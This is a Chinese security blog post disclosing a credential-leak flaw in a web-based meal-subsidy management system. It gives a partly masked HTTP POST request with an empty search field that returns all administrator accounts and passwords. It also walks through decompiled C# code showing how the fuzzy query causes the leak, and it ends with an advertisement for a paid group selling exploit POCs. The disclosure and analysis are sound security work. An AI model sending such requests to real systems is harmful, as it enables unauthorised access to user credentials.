长亭百川云 - 文章详情

.NET 漏洞 | 某云餐补系统泄露账户密码

dotNet安全矩阵

56

2024-07-15

01

阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02

漏洞背景

餐补管理系统是一款免安装的系统,配置好服务器后,商家、用户可随意在能上网的地方,在任何浏览器输入网址即可进入系统登录入口,系统利用最新的SQL SERVER技术,采用B/S结构,使用树形节点功能设计开发出这套成熟的消费系统。让操作人员工作起来更方便,更轻松。本系统有六大模块,分别是:常用功能、用户管理、资金管理、系统设置、系统管理、图表统计,另外还可扩展点餐、订餐、送餐管理模块。

03

漏洞复现

近日外部公开渠道爆出该系统的System**.as**接口存在敏感信息泄露漏洞,可导致攻击者获取后台管理员账户和密码。具体的数据包如下所示。

POST /System**.as** HTTP/1.1  
Host: xx.xx.xx.xx  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36  
  
page=1&arr_search=%7B%22username%22%3A%22%22%2C%22memo%22%3A%22%22%7D&funcName=get****

上述请求构造的POST请求,参数arr_search是一段URL编码的JSON字符串,包含了搜索参数,其中username和memo都是空字符串,发送请求后在页面返回显示所有的系统用户和密码等信息。如下图所示

04

漏洞分析

存在漏洞的是一个Handler,经过分析得知代码隐藏在New**.System**类名中,首先从HTTP请求的表单数据中获取arr_search参数,用JSON库进行解析,提取username和memo字段的值。

jo = JObject.Parse(context.Request.Form["arr_search"]);  
string username = jo["username"].ToString();  
string memo = jo["memo"].ToString();

接着,调用SystemMngBLL.getOperators方法,根据解析的username和memo参数查询数据,具体方法的实现代码如下所示。

public static DataSet getOperators(string name, string roles, int pageSize, int pageIndex)  
{  
    SqlParameter[] expr_06 = new SqlParameter[]  
    {  
        new SqlParameter("@name", "%" + name + "%"),  
        new SqlParameter("@roles", roles)  
    };  
    string str = "select qx.*,people.people_name from qx,people where qx.people_node=people.people_node and 1=1";  
    string statisticSql = "select count(1) userCount from qx where 1=1";  
    string where = "";  
    if (name != "")  
    {  
        where += " and username like @name";  
    }  
    if (roles != "")  
    {  
        where += " and qx.people_node in(select people_node from people where people_name=@roles)";  
    }  
    str += where;  
    statisticSql += where;  
    return SqlHelper.GetPageList(expr_06, str, "qx.people_node", pageSize, pageIndex, statisticSql);  
}

方法内部据传入的参数name和roles,构建SQL查询条件,这里使用了参数化查询避免了SQL注入漏洞,但是此处却是模糊查询导致为空的情况下搜索出所有的用户敏感数据。

漏洞详情已经打包在星球,感兴趣的朋友可以加入自取。更多的.NET漏洞情报,请加入星球后获取,星球持续更新最新的 .NET 应用漏洞POC,并在每年HW期间提供一手漏洞情报。这些POC/EXP涵盖了一些0day和1day漏洞,确保您始终掌握最前沿的安全信息和防护措施。

05

推荐阅读

从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!













06

欢迎加入.NET安全星球

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。

 目前星球门票¥199,后期价格随着内容和质量的不断沉淀会适当提高,星球即将涨价至 ¥239,因此越早加入越好! 

    目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。


星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2